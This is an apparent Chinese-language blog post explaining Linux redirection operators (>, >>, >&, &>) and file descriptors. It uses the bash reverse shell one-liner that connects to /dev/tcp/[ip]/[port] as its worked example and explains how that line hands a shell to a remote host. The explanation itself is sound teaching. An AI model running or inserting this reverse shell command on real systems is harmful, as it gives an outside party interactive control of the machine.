辨别Linux下的>,>>,>&与&>以及反弹shell语句的理解
2018-01-06 12:49
495 查看
前言
今天看到在Linux中反弹shell时,对常用的反弹shell语句产生了好奇。bash -i >& /dev/tcp/[ip]/[port] 0>&1
其实理解它最关键的地方还是在与对于几个看上去相似的符号的理解。
我写下来对于它们的看法,不对的地方请大家帮忙斧正。
文件描述符
有三种标准的文件描述符:0 - stdin 标准输入 1 - stdout 标准输出 2 - stderr 标准错误输出
还可以自己定义文件描述符,可以用于交换输出流。详见:https://unix.stackexchange.com/questions/42728/what-does-31-12-23-do-in-a-script?lq=1
>与>>
>用于将标准输出重定向至文件。ls -l > result.txt //结果将在文件中保存而不出现在bash中
>>和>相比的区别在于:>是覆写文件而>>是追加文件。
>&与&>
>&根据后面的参数不同会有不同的结果。当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符
一定注意:要使用>&来进行文件描述符的重定向
我看到很多博文中说>&和&>是一样的,但是查找不出来&>的相关资料,我认为应该是因为&>在一起并不像>&一样是一个标准的表达方式。
下面证明&>与>&并不相同。
rm notExist.file1 > result.txt 2>&1 //结果将被保存在result.txt rm notExist.file1 > result.txt 2&>1 //2与notExist.file1都被认为是要删除的文件 //结果保存在了一个文件1中
截图:
再谈对于反弹shell语句的理解
有了上面的介绍,再看反弹shell的语句就简单多了。bash -i >& /dev/tcp/[ip]/[port] 0>&1
bash -i 打开bash
>&后面跟 /dev/tcp/[ip]/[port] (相当于>&后面接文件)将bash的标准输出和标准错误输出传递到远程。
0>&1将标准输入重定向至标准输出,由于标准输出定向至远程,标准输入也借此定向到远程。(由于标准错误输出也定向至远程,因此把 0>&1 改为 0>&2 也可以得到一个交互shell)
相关文章推荐
- linux-->结合windows系统分区理解linux系统分区以及挂载点
- Linux:shell脚本命令: >/dev/null 2>&1 的理解
- Linux 2>&1理解(转)
- 练手毛坯作品基于LINUX的"QQ闹眼子版本"(包括服务器与客户端<图形版与SHELL文字版>)
- linux中./a.out > outfile 2>&1和./a.out 2> &1 >outfile重定问题的理解
- Linux(Ubuntu)环境MYSQL->master/slave主从同步设置以及注意事项
- linux脚本之>/dev/null 2>&1,以及2>1 VS 2>&1
- Shell中 2>&1理解
- [linux]/a.out > outfile 2>&1和./a.out 2> &1 >outfile理解
- linux shell 中"2>&1"含义
- linux中Shell标准输出错误 >/dev/null 2>&1 分析
- [Sqlite]-->嵌入式数据库事务理解以及实例操作
- Linux login & non-login shell 以及su, sudo相关概念
- shell: Linux中标准输入输出解释2>&1 crontab
- Linux-world-2012-January->10 (Shell之Sed)
- <Linux shell>Linux常用的几个指令
- struts2 <s:select>理解以及默认值的问题
- Linux-shell备忘录=>LTS
- linux 重定向 1>&2 2>&1的各种变形理解
- Linux(Ubuntu)环境MYSQL->master/slave主从同步设置以及注意事项